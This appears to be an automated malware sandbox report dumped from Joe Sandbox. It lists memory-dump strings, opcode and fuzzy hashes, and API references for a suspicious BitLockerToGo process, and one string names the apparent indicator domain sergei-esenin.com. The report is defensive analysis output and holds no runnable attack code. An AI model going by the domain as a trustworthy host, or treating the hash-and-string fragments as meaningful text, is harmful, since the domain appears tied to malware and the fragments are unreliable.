• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: +V5H$80I9$X\\h$r/!(
• API String ID: 0-3448863506
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: $F0l$xuy{
• API String ID: 0-4033455903
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$2$FM?>$Kj
• API String ID: 0-1586943010
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 01$4`[b$F$vh
• API String ID: 0-3121856630
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4`[b$PA$WP$ol
• API String ID: 0-1411690081
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: sergei-esenin.com$sf~g$35$?1
• API String ID: 0-3600862256
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,6B$4BB$P6B$V6B
• API String ID: 0-2245995098
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4`[b$4`[b$4`[b$}{
• API String ID: 0-475273664
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,8$0#$4`[b$G#
                                                                                                                                                            • API String ID: 0-1231841115
                                                                                                                                                            • Opcode ID: 63a8e670cd3f321320a73ea7204a99144efd9442fbc58dce641fe461cb0ed3b4
                                                                                                                                                            • Instruction ID: 9cd8ee819c306ef77ec6d8aa264ef613b79a42e954bf5329d783c408745fc08c
                                                                                                                                                            • Opcode Fuzzy Hash: 63a8e670cd3f321320a73ea7204a99144efd9442fbc58dce641fe461cb0ed3b4
                                                                                                                                                            • Instruction Fuzzy Hash: 308178B420C380DFE7289F55E891B5BBBE1FB86704F50892DE1C65B292C774A845CB4A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 0$<$>
                                                                                                                                                            • API String ID: 0-1437308683
                                                                                                                                                            • Opcode ID: ce5f5cd2ecc19bcb08e8012a785dd5fc260d3a6e557122c50a5a51424e5e1a63
                                                                                                                                                            • Instruction ID: a5c1a31e08865a8bb2aa65c712a9e7cbb3beaed26c35f48a0901508fa68ac188
                                                                                                                                                            • Opcode Fuzzy Hash: ce5f5cd2ecc19bcb08e8012a785dd5fc260d3a6e557122c50a5a51424e5e1a63
                                                                                                                                                            • Instruction Fuzzy Hash: 758207B2C186808AC700EBB4DD1639E7EF0EF52709F0545EDD6985B386E6748A4CCB67
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %7$%7$TC
                                                                                                                                                            • API String ID: 0-562761838
                                                                                                                                                            • Opcode ID: 98285b28069c82770ffc23064106d89e2dd26c25d44d21ba6645de89e21dbe50
                                                                                                                                                            • Instruction ID: a3390a0ea819f50f7e09a005f4fb0df624cd597feb74cf866aa404ef09407691
                                                                                                                                                            • Opcode Fuzzy Hash: 98285b28069c82770ffc23064106d89e2dd26c25d44d21ba6645de89e21dbe50
                                                                                                                                                            • Instruction Fuzzy Hash: 96420135A09206CFCB04CF28D8906AEB7F2FF8A304F29897DD985A7391D735A911CB55
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )uw$/^A$^Y
                                                                                                                                                            • API String ID: 0-867195589
                                                                                                                                                            • Opcode ID: a6bb22a4967ca951d5a305e6ffd944ff0515d2462caa79e64008a8f28d3c9f51
                                                                                                                                                            • Instruction ID: 99be8a06345161a7d2b48195821d81a54eebdd34de1f36dcd5d473763174f8cc
                                                                                                                                                            • Opcode Fuzzy Hash: a6bb22a4967ca951d5a305e6ffd944ff0515d2462caa79e64008a8f28d3c9f51
                                                                                                                                                            • Instruction Fuzzy Hash: CF22CEB09002168BDB24CF14C8A2BBBB7B2FF55314F198649D8565F395E339E981CB98
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %7$%7$TC
                                                                                                                                                            • API String ID: 0-562761838
                                                                                                                                                            • Opcode ID: 735f6b988e88c19a902557fc86c11b8990785cf3a617012ce579f53b6f5eca15
                                                                                                                                                            • Instruction ID: ad095b83308ca75fd8a4013f0ebfb119efa56f614bf737352143c9b46e94c767
                                                                                                                                                            • Opcode Fuzzy Hash: 735f6b988e88c19a902557fc86c11b8990785cf3a617012ce579f53b6f5eca15
                                                                                                                                                            • Instruction Fuzzy Hash: EB22FF35A04216CFCB04CF68D8906AFB7F2FF8A304F29896DD881A7395D735A911CB95
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 0<1
                                                                                                                                                            • API String ID: 0-2445462277
                                                                                                                                                            • Opcode ID: 7c82265b33f34ae6b3b4960a9ada9cf06471ada781cf8e6c9a3c98d05af78817
                                                                                                                                                            • Instruction ID: 732adb15a570e216f25a42f0fc421c12b11a59c7b995c3155cdc7c8633fe601c
                                                                                                                                                            • Opcode Fuzzy Hash: 7c82265b33f34ae6b3b4960a9ada9cf06471ada781cf8e6c9a3c98d05af78817
                                                                                                                                                            • Instruction Fuzzy Hash: 7F423830204B918BD334CF39D4907A7BBE2AF52314F548A5ED8E74B792C739A849CB59
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID: ~y$t${?vk
                                                                                                                                                            • API String ID: 2994545307-3090336065
                                                                                                                                                            • Opcode ID: 4efe7c964be661b0714e10038cf83f46b8c9ebe7142d5bc2375b62523062975f
                                                                                                                                                            • Instruction ID: e10378fa62e7c81c123d42e80a001619ac457b0f4a0d329f6ac98bfb666bfe04
                                                                                                                                                            • Opcode Fuzzy Hash: 4efe7c964be661b0714e10038cf83f46b8c9ebe7142d5bc2375b62523062975f
                                                                                                                                                            • Instruction Fuzzy Hash: 86B100717083508BD714DF28E890B2BB7E2EFA5304F55492EE585873A2D339EC45CB9A
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocString
                                                                                                                                                            • String ID: 0
                                                                                                                                                            • API String ID: 2525500382-4108050209
                                                                                                                                                            • Opcode ID: 3af0b670d267ad09d00f325ce7c903cf7bfea799d020b32faf102f16ac3abf35
                                                                                                                                                            • Instruction ID: bfb33143b9dcc868689a04b056aba8646cbeba0911787d759a7d2a88c05017e2
                                                                                                                                                            • Opcode Fuzzy Hash: 3af0b670d267ad09d00f325ce7c903cf7bfea799d020b32faf102f16ac3abf35
                                                                                                                                                            • Instruction Fuzzy Hash: D54282B182D7808AC310FF79D91635BBEE0EF6230AF45886DD4D94B282E274455CDB67
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b$YmC$rnC
                                                                                                                                                            • API String ID: 0-59352368
                                                                                                                                                            • Opcode ID: badf3ea7929c867e39bcd7ee1c88f0f2dfc5419602b87f973e397e8d097d2991
                                                                                                                                                            • Instruction ID: deb9105ce3a23a52add02b07606881298042af04edd39c8760c576839aa4ad74
                                                                                                                                                            • Opcode Fuzzy Hash: badf3ea7929c867e39bcd7ee1c88f0f2dfc5419602b87f973e397e8d097d2991
                                                                                                                                                            • Instruction Fuzzy Hash: E4A104B5A0820ACFDB24CFA4DC906BFB7B2FB49304F14456DD65267380D739A912CB98
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocString
                                                                                                                                                            • String ID: 0
                                                                                                                                                            • API String ID: 2525500382-4108050209
                                                                                                                                                            • Opcode ID: dd283732bf8849cdfeb91f3e454f6fc2a277198a0de7caf5cd01dda164c0a2de
                                                                                                                                                            • Instruction ID: c36ff4eb4e8d725c516780d075127ab2ec9eb111ec197b2971883632229e0c61
                                                                                                                                                            • Opcode Fuzzy Hash: dd283732bf8849cdfeb91f3e454f6fc2a277198a0de7caf5cd01dda164c0a2de
                                                                                                                                                            • Instruction Fuzzy Hash: D042F9B210DB818AD320EF60C65639FBEE1FBA1746F058C5ED1D947283E6788545CB27
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4`[b$4`[b$D
• API String ID: 0-2855741908
• Opcode ID: bee589adc475eb55dc856cc6db7432ca305c854b6497f41265853fe96f3c0c6b
• Instruction ID: 4419554b97a4f5d847f5d9919b56110a744d44bceafc1c0fee32142145e074b9
• Opcode Fuzzy Hash: bee589adc475eb55dc856cc6db7432ca305c854b6497f41265853fe96f3c0c6b
• Instruction Fuzzy Hash: DC816BB4208340EFD3149F55D4A076BBBE5FF86305F50892DE1C6473A0C3799951CB8A
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4`[b$PA$WP
• API String ID: 0-2416898959
• Opcode ID: ff2d449f2aa4d9f3ffc758bd8431d95441b0a1be0e7da30d1f37c7a3b1d079e2
• Instruction ID: 549f9a84d3ab0341397ba570cd15feaea4388fda82712428225536197b95a57b
• Opcode Fuzzy Hash: ff2d449f2aa4d9f3ffc758bd8431d95441b0a1be0e7da30d1f37c7a3b1d079e2
• Instruction Fuzzy Hash: E86156741083808BD724CF24D590AABB7E1FF8A304F689A2DE5D947361DB74D846CB8A
APIs
• CopyFileW.KERNEL32(00000000,3BF239E3,00000000), ref: 00422BBE
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: CopyFile
• String ID: 4`[b
• API String ID: 1304948518-3962175265
• Opcode ID: b9961f3839585efaccd962e9f29f2a7d8bbfcdf26810350a4e6eddb5a82c3ae0
• Instruction ID: 0c3d4c70e60530985c2703d929bb554d0460f899c4b92b9c4cb44d338b57eab6
• Opcode Fuzzy Hash: b9961f3839585efaccd962e9f29f2a7d8bbfcdf26810350a4e6eddb5a82c3ae0
• Instruction Fuzzy Hash: D3B199B4A0022A8BDF24CFA5DD917AFB772FF86300F1446A9D4562B3A1D7741A80CF59
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$8
• API String ID: 0-46163386
• Opcode ID: 1171e4ec7a2212bc72df6cc5595066c8480916da860539261476435c3818ad09
• Instruction ID: e8edce017f487f707f2e6d47ec8d736b69be34296e4668f859d56db9080cb230
• Opcode Fuzzy Hash: 1171e4ec7a2212bc72df6cc5595066c8480916da860539261476435c3818ad09
• Instruction Fuzzy Hash: D87248716083419FD710CF18C880B9BBBE1AF88354F14892EF9899B391D379E959CB97
APIs
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID:
• API String ID: 2610073882-0
• Opcode ID: c43d62e8caaeee034f6adf92c263bea60ae7a2dadf9431be23655d3ba116909b
• Instruction ID: f0766954b7b5b795c55ec1d0f4201926e4f1f9f3987028cba26740dcb7b0fd3e
• Opcode Fuzzy Hash: c43d62e8caaeee034f6adf92c263bea60ae7a2dadf9431be23655d3ba116909b
• Instruction Fuzzy Hash: BDB15CB210D7C19ADB24EF64D51579FBEE1ABA1385F058C2ED0C98B382D67C8844CB97
APIs
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID:
• API String ID: 2610073882-0
• Opcode ID: 4eb585e7636d6ba05d5816dda76f47ddf43147e3e8da7acdbb29f86e7ce18253
• Instruction ID: 4b4a2dc297dddf4c47e3306fdfb4e53bb7a54f94cb5cfa58beda48895b742729
• Opcode Fuzzy Hash: 4eb585e7636d6ba05d5816dda76f47ddf43147e3e8da7acdbb29f86e7ce18253
• Instruction Fuzzy Hash: B0A170B09193808AD701FF74D94630EBEB1EB5234AF0A895DD8C94B352E678C65CDB63
APIs
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID:
• API String ID: 2610073882-0
• Opcode ID: 937754175d20578f06493ae6c704ee8573383071d2f868bc382b2539920b2837
• Instruction ID: c322c4c80fd1420a24b9500037cb4fd9b04b6c47a114addf3463b4293bcc2ac7
• Opcode Fuzzy Hash: 937754175d20578f06493ae6c704ee8573383071d2f868bc382b2539920b2837
• Instruction Fuzzy Hash: 88A171B09193808AD701FF64D94530EBEB1EB5234AF4A895DE8C84B352E678C55CDB73
APIs
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID:
• API String ID: 2610073882-0
• Opcode ID: 682c4dffb5ce9691a029d2f982dc75b67a9a51b5a39244f86c501d207a0e764b
• Instruction ID: 2fa92ac346114f71ec5b8bb95167e382632e860aeab496c27a4361876f2d7e0b
• Opcode Fuzzy Hash: 682c4dffb5ce9691a029d2f982dc75b67a9a51b5a39244f86c501d207a0e764b
• Instruction Fuzzy Hash: 3891D7B110D7C18ED361EF64CA0638FBEE0AF6174AF89880EE0D84B282D7748549DB57
APIs
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID:
• API String ID: 2610073882-0
• Opcode ID: ea961aca6c503c6e50442a54cc3cd2bb5cbbae6d4d91e5a8cfdd1c12522c78a7
• Instruction ID: e6952b2da44c6cf9980322370981645b448c4fbbff7929ec209f8aa0f69e46d0
• Opcode Fuzzy Hash: ea961aca6c503c6e50442a54cc3cd2bb5cbbae6d4d91e5a8cfdd1c12522c78a7
• Instruction Fuzzy Hash: 1591BFB510D7828AD310EF64C51639FBEF0EFA2749F158C1EE1E887292C6788588DB57
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: %7$%7
• API String ID: 0-3114740580
• Opcode ID: 95702ab8c8dfd4ffedce7bff869b12acbd51280852a3c4ef4d7a9b65a7f033b5
• Instruction ID: d4ddb7d9814fba6a3bd99f3c5521e18485b3bc3c6a052377e5f9b84667f3e06b
• Opcode Fuzzy Hash: 95702ab8c8dfd4ffedce7bff869b12acbd51280852a3c4ef4d7a9b65a7f033b5
• Instruction Fuzzy Hash: 8E221635A05216CFCB08CF68D9906AFB7F2FF8A304F28896DC841A7395D735A911CB95
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 476$476
• API String ID: 0-1821123138
• Opcode ID: 38f795252a826b460610c94ff5dd04650731357aba88f3b62e24f205637323ae
• Instruction ID: f4853f25a7115d2ccb9483929346ca02aa1e36ed629206181771a5fec7e11523
• Opcode Fuzzy Hash: 38f795252a826b460610c94ff5dd04650731357aba88f3b62e24f205637323ae
• Instruction Fuzzy Hash: CA128C742093419FC714CF29C890B2FB7E1EB99314F189A2EE6D587392D739D805CB9A
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4`[b$xy
• API String ID: 0-3861070957
• Opcode ID: 32874e9922531811730813ef1462c357581392f5c3e4b505af1d527c3c503f32
• Instruction ID: 40080dca2f627201fa99e23294c6caa4fce92423dc08f85d2d2a9e2f3d3bfbd8
• Opcode Fuzzy Hash: 32874e9922531811730813ef1462c357581392f5c3e4b505af1d527c3c503f32
• Instruction Fuzzy Hash: ECD1DDB15482009BD715EF18C8D1B6BB7E1EF96354F04481EE4C687391E339E990CBAB
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )$IEND
                                                                                                                                                            • API String ID: 0-707183367
                                                                                                                                                            • Opcode ID: fe88e6eb84e576e94e5e9cf8292a898bf1ac053a1a194131b256779c269e66ca
                                                                                                                                                            • Instruction ID: d84f0a7c753a6f14cc2c5e98a322df84888d3b7d15746eb4d54176d0f752d062
                                                                                                                                                            • Opcode Fuzzy Hash: fe88e6eb84e576e94e5e9cf8292a898bf1ac053a1a194131b256779c269e66ca
                                                                                                                                                            • Instruction Fuzzy Hash: A2F1C0B1A047119BD314DF28C84575ABBE0BB85314F05463EE99AA73C1D778E924CBCA
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b$A@
                                                                                                                                                            • API String ID: 0-3080864223
                                                                                                                                                            • Opcode ID: c85e80eada8b595bcd8dec67665edaffd9fe9b7f5aea5fcdfa1f5076c87ae2b5
                                                                                                                                                            • Instruction ID: 667f5a27c419ae563cc22f1d67130efefa029fb26cebeccfba75b67c4bf04443
                                                                                                                                                            • Opcode Fuzzy Hash: c85e80eada8b595bcd8dec67665edaffd9fe9b7f5aea5fcdfa1f5076c87ae2b5
                                                                                                                                                            • Instruction Fuzzy Hash: 17C1BBB4E00228DFEF14CFA5E995BAEBB71FF06300F5040A9E50A6B252C7345A45CF99
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 476$@
                                                                                                                                                            • API String ID: 0-1619901514
                                                                                                                                                            • Opcode ID: 2edd24f0470ea495756651cbb646ca1a85ee499d5599157cfa72ce7a226500df
                                                                                                                                                            • Instruction ID: 5274497a0d402a1b10b049c383913524a6e8a02ad7b7e978e53740151cc6be14
                                                                                                                                                            • Opcode Fuzzy Hash: 2edd24f0470ea495756651cbb646ca1a85ee499d5599157cfa72ce7a226500df
                                                                                                                                                            • Instruction Fuzzy Hash: C75126B06193008BD314DF19D49076BB7F2FFAA704F04A92EE1C58B361D73A9815DB5A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4
                                                                                                                                                            • API String ID: 0-4088798008
                                                                                                                                                            • Opcode ID: adaf9c33dcc47fedfc573862e11efa05822a80d69ab86043e3391ce628374930
                                                                                                                                                            • Instruction ID: 87e5169a84a7c6d015d51784c64767990d8e7e2f63c45a3676347f9b814931e6
                                                                                                                                                            • Opcode Fuzzy Hash: adaf9c33dcc47fedfc573862e11efa05822a80d69ab86043e3391ce628374930
                                                                                                                                                            • Instruction Fuzzy Hash: 61C242B191D3808AD710FBB4ED1638EBEB0EB5130AF4544AED5885B342E6744A9CDF63
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: r+@
                                                                                                                                                            • API String ID: 0-2828589525
                                                                                                                                                            • Opcode ID: bb1f22855033e4373579e0f629f41e878020256f4b8940ca8e726927dd3cfa80
                                                                                                                                                            • Instruction ID: 0d601082f3fddcf8a6d57d7fb07cda231c93ff33936f2a1aef2fbd49c469f597
                                                                                                                                                            • Opcode Fuzzy Hash: bb1f22855033e4373579e0f629f41e878020256f4b8940ca8e726927dd3cfa80
                                                                                                                                                            • Instruction Fuzzy Hash: FB92147A61C251EFD304CF28D89126AB7E2FB86716F098A7DE0D483391C339DA55CB85
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: r+@
                                                                                                                                                            • API String ID: 0-2828589525
                                                                                                                                                            • Opcode ID: afa774026a89861503ddd84dc71ec75a81babf989be35216b30a84c227a25d6a
                                                                                                                                                            • Instruction ID: 1051428730a2a2cf9c9bff7ea539dd5cf55c9a041dc432fdf8cb40c483e002db
                                                                                                                                                            • Opcode Fuzzy Hash: afa774026a89861503ddd84dc71ec75a81babf989be35216b30a84c227a25d6a
                                                                                                                                                            • Instruction Fuzzy Hash: 6282147A61C291DFD304CF28D85126AB7E2FB96716F098A7DE0C483791C338DA55CB85
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: r+@
                                                                                                                                                            • API String ID: 0-2828589525
